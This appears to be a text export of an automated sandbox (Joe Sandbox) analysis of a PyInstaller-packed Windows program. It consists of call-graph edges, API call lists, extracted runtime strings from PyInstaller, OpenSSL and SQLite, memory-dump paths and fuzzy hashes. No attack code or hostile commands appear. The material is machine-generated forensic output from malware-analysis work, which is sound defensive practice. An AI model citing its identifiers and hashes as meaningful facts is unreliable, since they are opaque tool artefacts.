API calls 88121->88122 88125 7ff6b7501a92 88122->88125 88124 7ff6b7501a61 88265 7ff6b7502910 54 API calls _log10_special 88124->88265 88127 7ff6b7501c80 49 API calls 88125->88127 88128 7ff6b7501add 88127->88128 88129 7ff6b75106d4 73 API calls 88128->88129 88130 7ff6b7501b01 88129->88130 88131 7ff6b7501b35 88130->88131 88132 7ff6b7501b16 88130->88132 88133 7ff6b751039c _fread_nolock 53 API calls 88131->88133 88266 7ff6b7514f08 11 API calls _set_fmode 88132->88266 88135 7ff6b7501b4a 88133->88135 88137 7ff6b7501b50 88135->88137 88138 7ff6b7501b6f 88135->88138 88136 7ff6b7501b1b 88267 7ff6b7502910 54 API calls _log10_special 88136->88267 88268 7ff6b7514f08 11 API calls _set_fmode 88137->88268 88270 7ff6b7510110 37 API calls 2 library calls 88138->88270 88142 7ff6b7501b55 88269 7ff6b7502910 54 API calls _log10_special 88142->88269 88143 7ff6b7501b89 88143->88146 88271 7ff6b7502710 54 API calls _log10_special 88143->88271 88146->88106 88148 7ff6b750883a 88147->88148 88149 7ff6b7509390 2 API calls 88148->88149 88150 7ff6b7508859 GetEnvironmentVariableW 88149->88150 88151 7ff6b7508876 ExpandEnvironmentStringsW 88150->88151 88152 7ff6b75088c2 88150->88152 88151->88152 88154 7ff6b7508898 88151->88154 88153 7ff6b750c550 _log10_special 8 API calls 88152->88153 88155 7ff6b75088d4 88153->88155 88301 7ff6b7509440 WideCharToMultiByte WideCharToMultiByte __vcrt_freefls 88154->88301 88155->87940 88157 7ff6b75088aa 88158 7ff6b750c550 _log10_special 8 API calls 88157->88158 88159 7ff6b75088ba 88158->88159 88159->87940 88161 7ff6b75093b2 MultiByteToWideChar 88160->88161 88162 7ff6b75093d6 88160->88162 88161->88162 88164 7ff6b75093ec __vcrt_freefls 88161->88164 88163 7ff6b75093f3 MultiByteToWideChar 88162->88163 88162->88164 88163->88164 88164->87999 88302 7ff6b7506360 88165->88302 88168 7ff6b7503399 88237 7ff6b7503670 FreeLibrary 88168->88237 88170 7ff6b7503381 88170->88168 88370 7ff6b7506050 88170->88370 88172 7ff6b750338d 88172->88168 88379 7ff6b75061e0 54 API calls 88172->88379 
88175 7ff6b7501ca5 88174->88175 88518 7ff6b7514984 88175->88518 88178->87948 88180 7ff6b75045cc 88179->88180 88181 7ff6b7509390 2 API calls 88180->88181 88182 7ff6b75045f4 88181->88182 88183 7ff6b7509390 2 API calls 88182->88183 88184 7ff6b7504607 88183->88184 88541 7ff6b7515f94 88184->88541 88187 7ff6b750c550 _log10_special 8 API calls 88188 7ff6b750392b 88187->88188 88188->87938 88189 7ff6b7507f90 88188->88189 88190 7ff6b7507fb4 88189->88190 88191 7ff6b75106d4 73 API calls 88190->88191 88194 7ff6b750808b __vcrt_freefls 88190->88194 88192 7ff6b7507fd0 88191->88192 88192->88194 88709 7ff6b75178c8 88192->88709 88194->87942 88195 7ff6b75106d4 73 API calls 88197 7ff6b7507fe5 88195->88197 88196 7ff6b751039c _fread_nolock 53 API calls 88196->88197 88197->88194 88197->88195 88197->88196 88199 7ff6b751007c 88198->88199 88725 7ff6b750fe28 88199->88725 88201 7ff6b7510095 88201->87938 88202->88006 88203->88006 88204->87952 88205->87955 88206->87960 88207->87963 88208->87980 88209->88006 88210->87981 88211->88006 88213 7ff6b750c559 88212->88213 88214 7ff6b750c8e0 IsProcessorFeaturePresent 88213->88214 88215 7ff6b7503ca7 88213->88215 88216 7ff6b750c8f8 88214->88216 88215->88061 88737 7ff6b750cad8 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 88216->88737 88218 7ff6b750c90b 88738 7ff6b750c8a0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 88218->88738 88221->87994 88222->88006 88223->87979 88225 7ff6b7501c80 49 API calls 88224->88225 88226 7ff6b7504660 88225->88226 88226->88001 88227->88033 88228->88037 88229->88041 88230->88047 88231->88039 88232->88046 88233->88008 88234->88008 88235->88014 88237->88027 88238->88032 88239->88074 88240->88074 88242 7ff6b75036bc GetModuleFileNameW 88241->88242 88242->88078 88242->88079 88244 7ff6b75092bf FindClose 88243->88244 88245 7ff6b75092d2 88243->88245 88244->88245 88246 7ff6b750c550 _log10_special 8 API calls 88245->88246 88247 7ff6b750371a 88246->88247 88247->88084 88247->88085 
88248->88082 88249->88091 88250->88096 88251->88089 88252->88082 88254 7ff6b7510704 88253->88254 88272 7ff6b7510464 88254->88272 88256 7ff6b751071d 88256->88107 88285 7ff6b75103bc 88257->88285 88260->88112 88261->88146 88262->88118 88263->88146 88264->88124 88265->88146 88266->88136 88267->88146 88268->88142 88269->88146 88270->88143 88271->88146 88273 7ff6b75104ce 88272->88273 88274 7ff6b751048e 88272->88274 88273->88274 88275 7ff6b75104da 88273->88275 88284 7ff6b751a814 37 API calls 2 library calls 88274->88284 88283 7ff6b751546c EnterCriticalSection 88275->88283 88278 7ff6b75104df 88279 7ff6b75105e8 71 API calls 88278->88279 88280 7ff6b75104f1 88279->88280 88281 7ff6b7515478 _fread_nolock LeaveCriticalSection 88280->88281 88282 7ff6b75104b5 88281->88282 88282->88256 88284->88282 88286 7ff6b75103e6 88285->88286 88297 7ff6b7501a20 88285->88297 88287 7ff6b7510432 88286->88287 88289 7ff6b75103f5 __scrt_get_show_window_mode 88286->88289 88286->88297 88298 7ff6b751546c EnterCriticalSection 88287->88298 88299 7ff6b7514f08 11 API calls _set_fmode 88289->88299 88291 7ff6b751043a 88293 7ff6b751013c _fread_nolock 51 API calls 88291->88293 88292 7ff6b751040a 88300 7ff6b751a8e0 37 API calls _invalid_parameter_noinfo 88292->88300 88295 7ff6b7510451 88293->88295 88296 7ff6b7515478 _fread_nolock LeaveCriticalSection 88295->88296 88296->88297 88297->88115 88297->88116 88299->88292 88300->88297 88301->88157 88303 7ff6b7506375 88302->88303 88304 7ff6b7501c80 49 API calls 88303->88304 88305 7ff6b75063b1 88304->88305 88306 7ff6b75063dd 88305->88306 88307 7ff6b75063ba 88305->88307 88309 7ff6b7504630 49 API calls 88306->88309 88390 7ff6b7502710 54 API calls _log10_special 88307->88390 88310 7ff6b75063f5 88309->88310 88311 7ff6b7506413 88310->88311 88391 7ff6b7502710 54 API calls _log10_special 88310->88391 88380 7ff6b7504560 88311->88380 88312 7ff6b750c550 _log10_special 8 API calls 88315 7ff6b750336e 88312->88315 88315->88168 88333 7ff6b7506500 88315->88333 88317 7ff6b750642b 88319 

Control-flow Graph (graph rendering not reproduced; legend: Executed / Not Executed)
Strings
Memory Dump Source
• Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
• Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
Similarity
• API ID: ErrorFileLastModuleName
• String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag
• API String ID: 2776309574-3273434969
• Opcode ID: d52c1960cc45de78c26c9f57622ace5a14626686e839aa839f1fc42fe00fc1f1
• Instruction ID: f3c13057bcb0795d7ae581c6e9239222db61db7870566825c6748627edfbdb5b
• Opcode Fuzzy Hash: d52c1960cc45de78c26c9f57622ace5a14626686e839aa839f1fc42fe00fc1f1
• Instruction Fuzzy Hash: BE327923A0CA8291FB299B2DD4553B927A1AF44788F84443ADB5DC32F6EF2CF559C344
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2119745990.00007FFE00761000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00760000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffe00760000_program.jbxd
Similarity
• API ID:
• String ID: $..\s\ssl\record\ssl3_record.c$CONNE$GET $HEAD $POST $PUT $ssl3_get_record
• API String ID: 0-2781224710
• Opcode ID: b400293baa34000780f5a339118ca863fb8810f07702305baec27cbd6e082666
• Instruction ID: 637683ed405d1f1fee13467d312e42959eeff2dbaff3ceb2a85fc6b553e79e9b
• Opcode Fuzzy Hash: b400293baa34000780f5a339118ca863fb8810f07702305baec27cbd6e082666
• Instruction Fuzzy Hash: 84828061A0AA8281FB60BB21D4547B922A0EF86784F5C4036EB4D477BEDF7CE985C711

Control-flow Graph
Memory Dump Source
• Source File: 00000001.00000002.2120062918.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFE01300000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffe01300000_program.jbxd
Similarity
• API ID: 00007A463010
• String ID: -journal$immutable$nolock
• API String ID: 4225454184-4201244970
• Opcode ID: 2eb986691ab63cf5690bea890f4959007ca672382fe7041f02c4300093660c28
• Instruction ID: 61ad543d6d888814e0326e1701cd2e661fc641cbfdca3b8ccac42d054310133b
• Opcode Fuzzy Hash: 2eb986691ab63cf5690bea890f4959007ca672382fe7041f02c4300093660c28
• Instruction Fuzzy Hash: 01327C22A09782CAEB658F25985037937A1FF45BA8F094235CA6E0BBF5DF3CE455C311

Control-flow Graph
Memory Dump Source
• Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
Similarity
• API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
• String ID:
• API String ID: 1617910340-0
• Opcode ID: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
• Instruction ID: cf893e351dc205a47d7644c89b0848d5f0e7030fc3451c5f0b844973060f5006
• Opcode Fuzzy Hash: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
• Instruction Fuzzy Hash: 68C1AE37B28A4685EB10CFA9C4906AC3761FB49BA8F115239DF5E97BA4DF38E451C340
Memory Dump Source
• Source File: 00000001.00000002.2118545805.00007FFDFB429000.00000080.00000001.01000000.0000000F.sdmp, Offset: 00007FFDFAF20000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffdfaf20000_program.jbxd
Similarity
• API ID: ProtectVirtual$AddressLibraryLoadProc
• String ID: )tP
• API String ID: 3300690313-3907340667
• Opcode ID: eab163715ab1799b633ac6e81f81b77985ed928b0291ff377fca493afee617fe
• Instruction ID: f2b42df840af097b34a73ba61013dc2c7b44413ea0e5c0f9ecb81c09dff000a7
• Opcode Fuzzy Hash: eab163715ab1799b633ac6e81f81b77985ed928b0291ff377fca493afee617fe
• Instruction Fuzzy Hash: 5162282272919286E7198F38D6106BD77E0FB48789F045531EEAEC37D8EA7CEA45D700

Control-flow Graph (rendered graph not reproduced; basic-block edge dump omitted)
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2120062918.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFE01300000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffe01300000_program.jbxd
Similarity
• API ID: 00007A463010
• String ID: database schema is locked: %s$out of memory$statement too long
• API String ID: 4225454184-1046679716
• Opcode ID: 7f23d50979c88e00e17b4a476aebd8052426b92c118e75aeb5a3e9824675a78a
• Instruction ID: 7889928ddd94b615c0a754c5a890a7c933b39e27cf60508aafb662c496701ec5
• Opcode Fuzzy Hash: 7f23d50979c88e00e17b4a476aebd8052426b92c118e75aeb5a3e9824675a78a
• Instruction Fuzzy Hash: 57F18E22A0C78286EB65CF2594143BE6BA0FB85B88F1A4135DA8D0FBA5DF7CE545C740
APIs
Memory Dump Source
• Source File: 00000001.00000002.2119652825.00007FFDFBAB3000.00000080.00000001.01000000.00000004.sdmp, Offset: 00007FFDFB460000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffdfb460000_program.jbxd
Similarity
• API ID: ProtectVirtual$AddressLibraryLoadProc
• String ID:
• API String ID: 3300690313-0
• Opcode ID: 248494c49456e9061dd29398c4c192e6d920701940ac97edae2a832ef171e598
• Instruction ID: e5da794066cb80445f9f4987f002fb62e026548d81cfde92beded70aff1fc48c
• Opcode Fuzzy Hash: 248494c49456e9061dd29398c4c192e6d920701940ac97edae2a832ef171e598
• Instruction Fuzzy Hash: 5062266272999286E7158F38D41067D77E0F748785F049532EABEC37D8EABCEA45CB00
APIs
Memory Dump Source
• Source File: 00000001.00000002.2117242370.00007FFDFAF10000.00000080.00000001.01000000.00000013.sdmp, Offset: 00007FFDFAE60000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffdfae60000_program.jbxd
Similarity
• API ID: ProtectVirtual$AddressLibraryLoadProc
• String ID:
• API String ID: 3300690313-0
• Opcode ID: 6f314cbc243d0361b81c21546ac629a958ec6804df8a06217d551e75d8bff2aa
• Instruction ID: 1feb29e050cc90f3a52991bad67bad55a5bb1109eda53b64e6c95ea64344b1f2
• Opcode Fuzzy Hash: 6f314cbc243d0361b81c21546ac629a958ec6804df8a06217d551e75d8bff2aa
• Instruction Fuzzy Hash: 66624A2272819696E7198F38D4107BD77A0FB48795F445631FAAEC77C8EA3CEA45CB00
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2120062918.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFE01300000, based on PE: true
• Associated: 00000001.00000002.2120031328.00007FFE01300000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01461000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01463000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01478000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120284056.00007FFE0147A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120315849.00007FFE0147C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffe01300000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: 00007A463010
                                                                                                                                                                                                                                              • String ID: :memory:
                                                                                                                                                                                                                                              • API String ID: 4225454184-2920599690
                                                                                                                                                                                                                                              • Opcode ID: cf44c50e47a0b3b01bdbe700d5214534733093223424063c92267072b1ad3f60
                                                                                                                                                                                                                                              • Instruction ID: b3ecb1ef08776efd224a382ae86794c467451d0bf861a4af2e37f630b5a7d18a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cf44c50e47a0b3b01bdbe700d5214534733093223424063c92267072b1ad3f60
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C3428F72A0978286EB65AF25985037A77A0FFA5B88F054135DE4E0B7B5DF3CE494C302
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2295610775-0
                                                                                                                                                                                                                                              • Opcode ID: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                                                                                                                                                                                                              • Instruction ID: e73f47549c7a00f71c569e5c0274794dc2986bf4d1ef8f373acee72fd589298e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0CF06823A1C74286F7608F68B4997667390AB84768F050339DBAD426E4DF3CD059CB04
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2120062918.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFE01300000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120031328.00007FFE01300000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01461000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01463000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01478000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120284056.00007FFE0147A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120315849.00007FFE0147C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffe01300000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InfoSystem
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 31276548-0
                                                                                                                                                                                                                                              • Opcode ID: 0609f6becf4837133f86ac5623d419228c70d3b405efdb4a8828f98acc38b35e
                                                                                                                                                                                                                                              • Instruction ID: 5f460c12de983cfa19a7a413722382f39d91874366dcc6ee47c881ad5d5c760d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0609f6becf4837133f86ac5623d419228c70d3b405efdb4a8828f98acc38b35e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 36A1F560E0AB47C1FF588B65A8943B422F0BF55BC8F554939CA0E5E7B0EF6CE4958302

Control-flow Graph (function at 7ff6b7501950; executed/not-executed graph rendering not reproduced in this text export)
APIs
  • Part of subcall function 00007FF6B7507F90: _fread_nolock.LIBCMT ref: 00007FF6B750803A
• _fread_nolock.LIBCMT ref: 00007FF6B7501A1B
  • Part of subcall function 00007FF6B7502910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF6B7501B6A), ref: 00007FF6B750295E
Strings
Memory Dump Source
• Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
• Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
Similarity
• API ID: _fread_nolock$CurrentProcess
• String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
• API String ID: 2397952137-3497178890
• Opcode ID: b426b7569fd43417053a9482fb0298cff99dadbc456d732c1d031cb9eee9613e
• Instruction ID: 5c34680bb581b6037308d45a95421ba431b8b308b1ce436240f7b5630e3438f5
• Opcode Fuzzy Hash: b426b7569fd43417053a9482fb0298cff99dadbc456d732c1d031cb9eee9613e
• Instruction Fuzzy Hash: DC816F73A0C68686EB61DB2CD0412BD23A1FF88788F444535EB8DC7BA5EE3CE5858741

Control-flow Graph (graph rendering not reproduced in this text export)

Strings
Memory Dump Source
• Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
• Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
Similarity
• API ID: CurrentProcess
• String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
• API String ID: 2050909247-3659356012
• Opcode ID: 72f99dadd0a2177c1d42b060d7648ca84eb7dddf70f4030becfdb2944091b5e7
• Instruction ID: 45ed98669c2f5c538919f4ea6eed95d4527243c82f7e3c2e27c677da55cbe8a0
• Opcode Fuzzy Hash: 72f99dadd0a2177c1d42b060d7648ca84eb7dddf70f4030becfdb2944091b5e7
• Instruction Fuzzy Hash: 6D418023A0C65286EB10DF2994415B963A0FF44798F444936EF4D8BBB5EE3CE542CB01

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2120062918.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFE01300000, based on PE: true
• Associated: 00000001.00000002.2120031328.00007FFE01300000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000001.00000002.2120062918.00007FFE01461000.00000040.00000001.01000000.0000000B.sdmp
• Associated: 00000001.00000002.2120062918.00007FFE01463000.00000040.00000001.01000000.0000000B.sdmp
• Associated: 00000001.00000002.2120062918.00007FFE01478000.00000040.00000001.01000000.0000000B.sdmp
• Associated: 00000001.00000002.2120284056.00007FFE0147A000.00000080.00000001.01000000.0000000B.sdmp
• Associated: 00000001.00000002.2120315849.00007FFE0147C000.00000004.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffe01300000_program.jbxd
Similarity
• API ID: 00007A463010
• String ID: CREATE TABLE x(type text,name text,tbl_name text,rootpage int,sql text)$SELECT*FROM"%w".%s ORDER BY rowid$ase$sqlite_master$sqlite_temp_master$table
• API String ID: 4225454184-879093740
• Opcode ID: f9f91cf4c879a1f55dcf4b3cc1e56045de927a81096d4cf94589e99b2d0e2aef
• Instruction ID: 0f8b4ba066deafb73fae340496e1f1a607435f1e919cf5ebe93cce073d2f25b5
• Opcode Fuzzy Hash: f9f91cf4c879a1f55dcf4b3cc1e56045de927a81096d4cf94589e99b2d0e2aef
• Instruction Fuzzy Hash: BAE1BB62E08B928AFB10CB6581403BD6BA5FB55B98F064235DE4D1BBB5DF3CE852C340

Control-flow Graph

Strings
Memory Dump Source
• Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
• Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
Similarity
• API ID: CurrentProcess
• String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
• API String ID: 2050909247-2813020118
• Opcode ID: 4176682b56444a78b74e0a45c684f191b40491c6c63e868bb09f8baa48a37ad0
• Instruction ID: 7f9a54e1071fe5532483c2daa4c48b6f1c9070b51bd920409945892258ffb7f6
• Opcode Fuzzy Hash: 4176682b56444a78b74e0a45c684f191b40491c6c63e868bb09f8baa48a37ad0
• Instruction Fuzzy Hash: CA51B123A0C68685EA61AB1AA4403BE6391FF84798F484135EF4DC7BF5EE3CE546C700

Control-flow Graph

APIs
• GetModuleFileNameW.KERNEL32(?,00007FF6B7503804), ref: 00007FF6B75036E1
• GetLastError.KERNEL32(?,00007FF6B7503804), ref: 00007FF6B75036EB
  • Part of subcall function 00007FF6B7502C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF6B7503706,?,00007FF6B7503804), ref: 00007FF6B7502C9E
  • Part of subcall function 00007FF6B7502C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF6B7503706,?,00007FF6B7503804), ref: 00007FF6B7502D63
  • Part of subcall function 00007FF6B7502C50: MessageBoxW.USER32 ref: 00007FF6B7502D99
Strings
Memory Dump Source
• Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
• Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
Similarity
• API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
• String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
• API String ID: 3187769757-2863816727
• Opcode ID: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
• Instruction ID: d60e2cf233a9c2584f606a4fd9246dd198f0468a1ff550510e47011322249933
• Opcode Fuzzy Hash: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
• Instruction Fuzzy Hash: F3214F63F1C64251FB219B2CE8153B62350BF99358F804136E75EC65F6EE2CE604C744

Control-flow Graph

1572->1571 1573->1562
APIs
Memory Dump Source
• Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
• Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmp
